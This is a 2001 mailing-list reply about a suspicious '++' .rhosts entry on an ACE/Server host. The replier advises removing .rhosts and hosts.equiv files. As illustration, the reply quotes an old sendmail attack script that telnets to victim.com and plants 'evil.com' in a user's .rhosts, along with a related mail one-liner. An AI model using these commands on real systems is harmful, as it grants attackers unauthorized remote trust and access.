-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Le Mon, Jan 08, 2001 at 10:24:09AM +0900,
Sun Young Geun\(¼±¿µ±Ù\) ([EMAIL PROTECTED])
a écrit:
> I'm operating ACE/SERVER.
> ACE/server is configured master and slave.
>
> I have some question about security.
>
> 1. I found something in .rhosts file like that.
>
> #cat .rhosts
> ++
gnnii !!!
in ~/.bash_history ? the hash is a root command if you found this in a unowned
group user or in a deamon log, please remove all .rhost user's files
hosts.equiv too. very pas glop!!
evil % echo "evil.com" | uuencode /home/zen/.rhosts | mail [EMAIL PROTECTED]
e.g.
but I don't know what is ACE/SERVER. if evil don't know what is your operating
system, don't possible to attack like this. You must have other logs. In unix,
that be dangerous.
> Do they use r-command when master and slave communicate each other?
> If not, is there any problem whithout .rhosts file?
> I want to delete .rhosts file because it is very vulnarable in securtiy.
>
> 2. I want to comment all services except for telnet service.
> The inetd.conf file allows services.
> If I open only telnet service, is there any problem in ACE/SERVER?
% cat evil_sendmail
telnet victim.com 25 << EOSM
rcpt to: /home/zen/.rhosts
mail from: zen
data
random garbage
.
rcpt to: /home/zen/.rhosts
mail from: zen
data
evil.com
.
quit
EOSM
>
> Please reply to me a.s.a.p.
>
> Happy new year !!
Bonne année :-)
- --
Une auto-stoppeuse est une jeune femme généralement jolie et court vêtue qui
se trouve sur votre route quand vous êtes avec votre femme.
Woody ALLEN
- --- gpg key:http://bermudos.free.fr/.key/pubring.asc
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.3 (GNU/Linux)
Comment: Pour information voir http://www.gnupg.org
iEYEARECAAYFAjpaOfYACgkQ79KAEZQ0U56clQCgmlpCf62HEhLvGU39lStHw072
Pj8AoNwsLCHdE47eZ3SVT7XOO2fUm2rU
=Vt5N
-----END PGP SIGNATURE-----
-
[To unsubscribe, send mail to [EMAIL PROTECTED] with
"unsubscribe firewalls" in the body of the message.]
